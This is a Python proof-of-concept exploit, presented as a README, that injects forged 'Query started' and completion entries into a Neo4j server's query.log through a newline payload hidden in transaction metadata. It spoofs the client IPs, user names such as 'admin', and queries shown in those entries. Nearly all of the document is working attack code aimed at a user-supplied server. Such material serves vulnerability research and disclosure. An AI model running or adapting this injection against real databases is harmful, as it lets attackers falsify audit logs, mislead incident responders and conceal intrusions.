README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Log Injection Proof of Concept
==============================
Usage:
    python log_injection_poc.py [--uri URI] [--user USER] [--password PASS]

Example:
    python log_injection_poc.py --uri bolt://192.168.1.100:7687 --password secret
"""
import argparse
from datetime import datetime
from neo4j import GraphDatabase
def create_fake_query_started(timestamp: str, query_id: str, tx_id: str,
                              client_ip: str, user: str, query: str,
                              driver: str) -> str:
    """Create a fake 'Query started:' log entry.

    All arguments are interpolated verbatim; nothing is escaped or validated.

    Args:
        timestamp: Text placed at the very start of the line, immediately
            followed by the literal ``+0000``.
        query_id: Value written after ``id:``.
        tx_id: Value written after ``transaction id:``.
        client_ip: Value written after ``client/``.
        user: Value written in the user field, after the literal ``neo4j - ``.
        query: Query text written after the user field.
        driver: Driver/user-agent text written in the tab-separated
            ``bolt-session`` section.

    Returns:
        The single formatted line, without a trailing newline.
    """
    # Timing and page-hit fields are fixed literals; only the identifying
    # fields vary between entries.
    return (
        f"{timestamp}+0000 INFO Query started: id:{query_id} - transaction id:{tx_id} - "
        f"0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - "
        f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t"
        f"neo4j - {user} - {query} - {{}} - runtime=null - {{}}"
    )
def create_fake_completion(timestamp: str, query_id: str, tx_id: str,
                           client_ip: str, user: str, query: str,
                           driver: str, duration_ms: int = 1) -> str:
    """Create a fake query completion log entry.

    All arguments are interpolated verbatim; nothing is escaped or validated.

    Args:
        timestamp: Text placed at the very start of the line, immediately
            followed by the literal ``+0000``.
        query_id: Value written after ``id:``.
        tx_id: Value written after ``transaction id:``.
        client_ip: Value written after ``client/``.
        user: Value written in the user field, after the literal ``neo4j - ``.
        query: Query text written after the user field.
        driver: Driver/user-agent text written in the tab-separated
            ``bolt-session`` section.
        duration_ms: Number written before ``ms:``. Defaults to 1.

    Returns:
        The single formatted line, without a trailing newline.
    """
    # Unlike the "Query started" line, this one has no "Query started:" tag,
    # carries the caller-supplied duration, and reports runtime=pipelined.
    return (
        f"{timestamp}+0000 INFO id:{query_id} - transaction id:{tx_id} - "
        f"{duration_ms} ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - "
        f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t"
        f"neo4j - {user} - {query} - {{}} - runtime=pipelined - {{}}"
    )
def _build_payload(fake_queries: list[dict[str, str]], timestamp: str,
                   driver_string: str) -> str:
    """Join the start and completion lines for every entry into one string."""
    # Every "Query started" line is newline-terminated.
    started_lines = "".join(
        create_fake_query_started(
            timestamp, fq["id"], fq["tx_id"], fq["ip"],
            fq["user"], fq["query"], driver_string,
        ) + "\n"
        for fq in fake_queries
    )
    # Completion lines are newline-separated with no newline after the last
    # one, so whatever follows the value is appended on that same line.
    completion_lines = "\n".join(
        create_fake_completion(
            timestamp, fq["id"], fq["tx_id"], fq["ip"],
            fq["user"], fq["query"], driver_string, duration_ms=i + 1,
        )
        for i, fq in enumerate(fake_queries)
    )
    # Leading "'\n": close the quote from {x: ' and start a new line.
    return "'\n" + started_lines + completion_lines


def main() -> int:
    """Run the proof of concept against the server given on the command line.

    Parses ``--uri``, ``--user`` and ``--password``, runs one plain query for
    comparison, then runs ``RETURN 1`` in a transaction whose metadata key
    ``x`` carries the generated payload.

    Returns:
        0 on success, 1 if any exception was raised while talking to the
        server (the error is printed).
    """
    # Local import: the file's top-level import only brings in `datetime`.
    from datetime import timezone

    parser = argparse.ArgumentParser(description="Log Injection PoC - Clean Fake Entries")
    parser.add_argument("--uri", default="bolt://127.0.0.1:7687",
                        help="Neo4j URI (default: bolt://127.0.0.1:7687)")
    parser.add_argument("--user", default="neo4j", help="Neo4j username (default: neo4j)")
    parser.add_argument("--password", default="password123", help="Neo4j password (default: password123)")
    args = parser.parse_args()

    print("=" * 40)
    print("LOG INJECTION PoC")
    print("=" * 40)
    print(f"Target: {args.uri}")
    print(f"User: {args.user}")
    print()

    # Millisecond-precision UTC timestamp; [:-3] trims microseconds to millis.
    # datetime.utcnow() is deprecated since Python 3.12; the aware equivalent
    # formats identically because the pattern contains no offset directive.
    timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]

    # Realistic driver string
    driver_string = "neo4j-python/6.0.3 Python/3.13.9-final-0 (linux)"

    # Multiple fake queries to inject - each with unique tx_id to avoid analyzer confusion
    fake_queries = [
        {
            "id": "700", "tx_id": "100", "ip": "10.0.0.1:1337",
            "user": "neo4j",
            "query": "MATCH (n:FakeQuery1) RETURN n LIMIT 1",
        },
        {
            "id": "701", "tx_id": "101", "ip": "192.168.1.50:4444",
            "user": "admin",
            "query": "MATCH (n:FakeQuery2) RETURN n LIMIT 1",
        },
    ]

    # Real queries have: Query started + completion, so both are generated.
    payload = _build_payload(fake_queries, timestamp, driver_string)

    print("Injecting fake log entries...")
    print("-" * 40)
    for fq in fake_queries:
        print(f" • {fq['user']}@{fq['ip']}: {fq['query'][:50]}...")
    print("-" * 40)

    try:
        # Context managers guarantee the driver, sessions and transactions
        # are released even when a query raises; previously the driver was
        # only closed on the success path.
        with GraphDatabase.driver(args.uri, auth=(args.user, args.password)) as driver:
            # Query BEFORE injection (for comparison in logs) - real query 1
            with driver.session() as session:
                with session.begin_transaction() as tx:
                    tx.run("MATCH (n:RealQuery) RETURN n LIMIT 1").consume()
                    tx.commit()
            print(" Executed: MATCH (n:RealQuery) RETURN n LIMIT 1 (real)")

            # The query whose transaction metadata carries the payload
            with driver.session() as session:
                with session.begin_transaction(metadata={"x": payload}) as tx:
                    tx.run("RETURN 1")
                    tx.commit()
            print(" Executed: RETURN 1 (with injected fake entries)")
    except Exception as e:
        # Top-level boundary of a CLI script: report and signal failure.
        print(f"[ERROR] Failed: {e}")
        return 1

    print()
    print("=" * 40)
    print("Check query.log")
    return 0
if __name__ == "__main__":
    # The bare `exit` builtin is injected by the `site` module and is missing
    # under `python -S` or in frozen builds; raising SystemExit always works
    # and passes main()'s return value through as the process exit status.
    raise SystemExit(main())